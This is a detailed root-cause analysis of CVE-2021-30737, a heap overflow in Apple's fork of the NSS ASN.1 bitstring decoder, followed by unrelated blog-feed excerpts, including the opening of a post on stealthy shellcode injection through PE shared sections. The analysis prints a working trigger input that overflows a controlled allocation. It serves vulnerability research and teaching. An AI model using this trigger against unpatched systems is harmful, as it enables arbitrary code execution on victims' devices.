On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as an quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of text. Transcript: Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Impact: Processing a maliciously crafted certification may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

         PORT_ArenaRelease(cx->our_pool, state->our_mark);

         state->our_mark = NULL;

     }

-    if (new_state != NULL) {

-        PORT_Free(new_state);

-    }

     return NULL;

 }

 

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if ((state->pending == 0) || (state->contents_length == 1)) {

+    if (state->pending == 0) {

                if (state->dest != NULL) {

                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);

                        item->Data = NULL;

                        item->Length = 0;

                        state->place = beforeEndOfContents;

-               }

-               if(state->contents_length == 1) {

-                       /* skip over (unused) remainder byte */

-                       return 1;

-               }

-               else {

-                       return 0;

+            return 0;

                }

     }

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 1 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 0 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0 , which is encoded as two NULL bytes.

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

  {

    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

                                         //  may be constructed

    0,     // offset: in dest/src

    NULL,  // sub: subtemplate for indirection

    sizeof(SecAsn1Item) // size: of output structure

  }

};

A SecASN1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

  SEC_ASN1Decode(pool,     // pool: arena for destination allocations

                 &decoded, // dest: decoded encoded items in to here

                 &simple_bitstring_template, // template

                 asn1_bytes,      // buf: asn1 input bytes

                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

  SEC_ASN1DecoderContext *top; 

  const SecAsn1Template *theTemplate;

  void *dest;

 

  struct sec_asn1d_state_struct *parent;

  struct sec_asn1d_state_struct *child;

 

  sec_asn1d_parse_place place;

 

  unsigned long contents_length;

  unsigned long pending;

  unsigned long consumed;

  int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

​​typedef enum {

    beforeIdentifier,

    duringIdentifier,

    afterIdentifier,

    beforeLength,

    duringLength,

    afterLength,

    beforeBitString,

    duringBitString,

    duringConstructedString,

    duringGroup,

    duringLeaf,

    duringSaveEncoding,

    duringSequence,

    afterConstructedString,

    afterGroup,

    afterExplicit,

    afterImplicit,

    afterInline,

    afterPointer,

    afterSaveEncoding,

    beforeEndOfContents,

    duringEndOfContents,

    afterEndOfContents,

    beforeChoice,

    duringChoice,

    afterChoice,

    notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {

    case beforeIdentifier:

      consumed = sec_asn1d_parse_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case duringIdentifier:

      consumed = sec_asn1d_parse_more_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case afterIdentifier:

      sec_asn1d_confirm_identifier (state);

      break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;

  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf which copies the raw encoded string bytes for example simply memcpy's into the output buffer with no bounds checks that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

    size_t Length;

    uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is only the function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The highlighted region of the function are the characters which were removed by the patch. This function is meant to return the number of input bytes (pointed to by buf) which it consumed and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out-of-sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) for determining whether this a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level-indefinite input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really really hard to audit, even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and  sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits bytes and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring so therefore it was quite reasonable to think that the way it was handling that case by NULLing out item->data was the right thing to do, so it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to in the end just revert a change made during import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

A Sneak Peek into Smart Contracts Reversing and Emulation

5 April 2022 at 10:00
In the last years the web3 topic became increasingly relevant and, as for every buzzword, a lot of companies and start-ups started developing solutions based on it. Consequently there also was an increase on the number of attacks and vulnerabilities found in such projects, for example: Saurik’s write up on Optimism, the PolyNetwork hack, the Ronin Validator compromission, and many more. In this post we will scratch the surface of the topic, limiting our focus on the Ethereum blockchain.

Sharing is Caring: Abusing Shared Sections for Code Injection

4 April 2022 at 16:00
Sharing is Caring: Abusing Shared Sections for Code Injection

Moving laterally across processes is a common technique seen in malware in order to spread across a system. In recent years, Microsoft has moved towards adding security telemetry to combat this threat through the "Microsoft-Windows-Threat-Intelligence" ETW provider.

This increased telemetry alongside existing methods such as ObRegisterCallbacks has made it difficult to move laterally without exposing malicious operations to kernel-visible telemetry. In this article, we will explore how to abuse certain quirks of PE Sections to place arbitrary shellcode into the memory of a remote process without requiring direct process access.

Background

Existing methods of moving laterally often involve dangerous API calls such as OpenProcess to gain a process handle accompanied by memory-related operations such as VirtualAlloc, VirtualProtect, or WriteProcessMemory. In recent years, the detection surface for these operations has increased.

For example, on older versions of Windows, one of the only cross-process API calls that kernel drivers had documented visibility into was the creation of process and thread handles via ObRegisterCallbacks.

The visibility introduced by Microsoft’s threat intelligence ETW provider has expanded to cover operations such as:

  1. Read/Write virtual memory calls (EtwTiLogReadWriteVm).
  2. Allocation of executable memory (EtwTiLogAllocExecVm).
